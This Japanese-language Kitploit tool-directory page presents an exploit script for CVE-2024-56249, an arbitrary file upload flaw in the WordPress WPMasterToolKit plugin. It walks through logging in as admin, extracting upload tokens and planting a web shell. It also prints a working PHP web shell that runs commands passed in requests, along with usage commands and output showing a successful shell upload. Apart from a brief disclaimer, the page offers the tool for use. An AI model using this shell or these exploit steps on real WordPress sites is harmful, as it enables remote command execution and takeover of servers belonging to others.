Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/nxploited/cve-2024-56249
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit プラグイン <= 1.13.1 - 任意のファイルアップロードの脆弱性

リポジトリを見る
1111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛠️ WordPress Master Toolkit エクスプロイト (CVE-2024-56249)

🌟 概要

このスクリプトは、WordPress WPMasterToolKit プラグインの任意ファイルアップロード(Arbitrary File Upload)の脆弱性を悪用し、攻撃者がサーバーにウェブシェルをアップロードできるようにします。この脆弱性はプラグインのバージョン 1.13.1 以下に存在します。

📝 CVE 詳細

  • CVE ID: CVE-2024-56249
  • 公開日: 2025-01-02
  • 更新日: 2025-01-02
  • 説明: Webdeclic WPMasterToolKit には、危険なタイプのファイルを無制限にアップロードできる脆弱性(Unrestricted Upload of File with Dangerous Type)があり、ウェブサーバーにウェブシェルをアップロードすることが可能です。
  • CWE: CWE-434: 危険なタイプのファイルの無制限アップロード(Unrestricted Upload of File with Dangerous Type)
  • CVSS スコア: 9.1 (Critical)
  • CVSS ベクター: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 使用方法

この脆弱性を悪用するには、次のコマンドを使用します:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 パラメータ

  • -u / --url: 対象の WordPress URL(例: http://192.168.100.74:888/wordpress)
  • -un / --username: WordPress 管理者ユーザー名
  • -p / --password: WordPress 管理者パスワード
  • -fp / --filepath: ファイルのアップロードパス(デフォルト: wp-content/uploads/2025/03)
  • -fn / --filename: アップロードするファイル名(デフォルト: shell.php)

🧩 スクリプトの解説

🔍 1. 脆弱性の調査

スクリプトはまず対象 URL を調査し、WPMasterToolKit プラグインのバージョンを確認して、CVE-2024-56249 に対して脆弱かどうかを検証します。

🔑 2. WordPress への認証

次に、提供された認証情報を使用して WordPress 管理パネルへのログインを試みます。

🛡️ 3. セキュリティトークンの抽出

ログインに成功すると、スクリプトはファイルアップロードに必要なセキュリティトークン(nonce と token)を抽出します。

📤 4. ペイロードの展開

抽出したトークンを使用して、指定されたファイル(例: ウェブシェル)を対象サーバーにアップロードします。

✅ 5. アップロードの確認

最後に、スクリプトは対象 URL からファイルにアクセスできるかどうかを確認し、アップロードが成功したかを検証します。

📂 注意

実行前に、シェルファイル(例: shell.php)がスクリプトと同じディレクトリに配置されていることを確認してください。これは、スクリプトがファイルを正常に特定してアップロードするために必要です。

シェルファイルの例 (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 例

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ 出力

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ スクリプトの使用方法

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ 免責事項

このツールは教育目的のみを意図しています。使用は自己責任で行ってください。作者は、このツールの誤用またはそれによって生じたいかなる損害についても責任を負いません。


Nxploit | Khaled Alenazi によるエクスプロイトスクリプト

ツールをダウンロード